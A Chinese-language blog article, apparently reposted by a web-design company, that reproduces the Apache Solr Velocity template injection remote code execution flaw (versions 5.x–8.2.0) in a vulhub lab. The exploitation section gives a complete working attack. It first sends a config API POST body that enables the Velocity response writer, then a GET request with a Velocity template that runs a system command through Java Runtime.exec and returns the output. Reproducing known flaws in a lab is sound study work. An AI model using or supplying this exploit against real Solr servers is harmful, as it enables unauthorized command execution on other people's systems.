這期內(nèi)容當(dāng)中小編將會(huì)給大家?guī)碛嘘P(guān)Apache Solr Velocity模板注入RCE漏洞復(fù)現(xiàn)是怎樣的，文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述，閱讀完這篇文章希望大家可以有所收獲。

創(chuàng)新互聯(lián)從2013年創(chuàng)立，先為平橋等服務(wù)建站，平橋等地企業(yè)，進(jìn)行企業(yè)商務(wù)咨詢服務(wù)。為平橋企業(yè)網(wǎng)站制作PC+手機(jī)+微官網(wǎng)三網(wǎng)同步一站式服務(wù)解決您的所有建站問題。

0x00 簡介

Solr是一個(gè)獨(dú)立的企業(yè)級(jí)搜索應(yīng)用服務(wù)器，它對(duì)外提供類似于Web-service的API接口。用戶可以通過http請(qǐng)求，向搜索引擎服務(wù)器提交一定格式的XML文件，生成索引；也可以通過Http Get操作提出查找請(qǐng)求，并得到XML格式的返回結(jié)果。

0x01 漏洞概述

0x02 影響范圍

Apache Solr 5.x - 8.2.0，存在config API版本

0x03 環(huán)境搭建

在線環(huán)境：

轉(zhuǎn)發(fā)本文到朋友圈，截圖發(fā)至公眾號(hào)

自行搭建：

使用vulhub中CVE-2019-0193的環(huán)境進(jìn)行搭建

啟動(dòng)vulhub環(huán)境：

git clone https://github.com/vulhub/vulhub.gitcd vulhub/solr/CVE-2019-0193docker-compose up -d

創(chuàng)建名為test的Core：

docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db

搭建好后默認(rèn)端口為8983，訪問http://ip:8983 即可

0x04 漏洞利用

利用前提：攻擊者需要知道Solr服務(wù)中Core的名稱才能執(zhí)行攻擊

如上圖所示的這個(gè)名稱就是Core的名稱

直接構(gòu)造POST請(qǐng)求，在/solr/test/config目錄POST以下數(shù)據(jù)（修改Core的配置）

{  "update-queryresponsewriter": {    "startup": "lazy",    "name": "velocity",    "class": "solr.VelocityResponseWriter",    "template.base.dir": "",    "solr.resource.loader.enabled": "true",    "params.resource.loader.enabled": "true"  }}

然后使用公開的exp發(fā)送請(qǐng)求

http://ip:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

即可成功執(zhí)行命令

上述就是小編為大家分享的Apache Solr Velocity模板注入RCE漏洞復(fù)現(xiàn)是怎樣的了，如果剛好有類似的疑惑，不妨參照上述分析進(jìn)行理解。如果想知道更多相關(guān)知識(shí)，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。